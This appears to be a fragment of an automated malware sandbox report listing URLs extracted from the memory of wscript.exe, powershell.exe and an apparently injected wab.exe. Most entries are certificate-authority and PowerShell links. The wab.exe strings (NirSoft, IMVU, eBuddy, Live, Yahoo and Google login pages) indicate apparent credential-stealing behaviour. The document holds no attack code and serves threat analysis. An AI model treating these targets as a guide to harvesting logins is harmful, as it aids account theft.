Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000001.00000002.2525142597.000002B7A81D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2319330594.00000000047C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wscript.exe, 00000000.00000003.1623323054.000001ABE882A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623383639.000001ABE882D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623335324.000001ABE882B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
Source: wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es00
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623246947.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623246947.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.anf.es
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.anf.es/es/address-direccion.html
Source: powershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wscript.exe, 00000000.00000003.1623323054.000001ABE882A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623383639.000001ABE882D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623335324.000001ABE882B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: wscript.exe, 00000000.00000003.1623406801.000001ABE881C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: wscript.exe, 00000000.00000003.1623646795.000001ABE682D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
Source: wscript.exe, 00000000.00000003.1623646795.000001ABE682D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623040678.000001ABE88C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.comsign.co.il/cps0
Source: wscript.exe, 00000000.00000003.1623370554.000001ABE8813000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
Source: wscript.exe, 00000000.00000003.1623115975.000001ABE889F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.datev.de/zertifikat-policy-std0
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.defence.gov.au/pki0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.disig.sk/ca0f
Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8848000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623235532.000001ABE8846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: wscript.exe, 00000000.00000003.1624174488.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623093541.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: wscript.exe, 00000000.00000003.1624174488.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623093541.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: wscript.exe, 00000000.00000003.1623093541.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: wab.exe, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wscript.exe, 00000000.00000003.1629349397.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8880000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1630136990.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623138797.000001ABE887F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623664338.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629143294.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624136639.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623615949.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629709832.000001ABE8882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.eme.lv/repository0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: wscript.exe, 00000000.00000003.1623052604.000001ABE88AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: wab.exe, wab.exe, 0000000F.00000002.2473933419.000000000371D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 0000000F.00000002.2473933419.000000000371D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comta
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: wab.exe, 0000000D.00000002.2478998922.0000000000113000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oaticerts.com/repository.
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: wscript.exe, 00000000.00000003.1623274472.000001ABE8837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623182608.000001ABE8876000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623040678.000001ABE88C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.rcsc.lt/repository0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623115975.000001ABE889F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623246947.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623246947.000001ABE8874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: powershell.exe, 00000001.00000002.2525142597.000002B7A81D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2319330594.00000000047C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746252567.000001ABE676E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624251674.000001ABE88A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748409727.000001ABE67A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747626632.000001ABE67A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747456994.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1747117797.000001ABE6783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: wscript.exe, 00000000.00000003.1622254049.000001ABE67A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000005.00000002.2319330594.0000000004919000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2525142597.000002B7A96E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2624655236.000002B7C068E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: wab.exe, 0000000D.00000003.2474969617.0000000000A01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wab.exe, 0000000D.00000003.2478450664.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478641943.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2479677849.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2476480949.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478746986.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2477359526.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2474969617.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2476544484.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2476284087.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2474969617.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478514452.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2478578223.0000000000A00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000001.00000002.2606411580.000002B7B8242000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2320148012.000000000582A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: wscript.exe, 00000000.00000003.1624174488.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623093541.000001ABE88BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE88A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1622991562.000001ABE88A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://repository.tsp.zetes.com0
Source: wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: wscript.exe, 00000000.00000003.1623335324.000001ABE8833000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623298130.000001ABE882E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/address/)1(0&
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: wscript.exe, 00000000.00000003.1622977481.000001ABE88B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: wab.exe, wab.exe, 0000000F.00000002.2440006081.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: wscript.exe, 00000000.00000003.1622961066.000001ABE88C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.netlock.hu/docs/
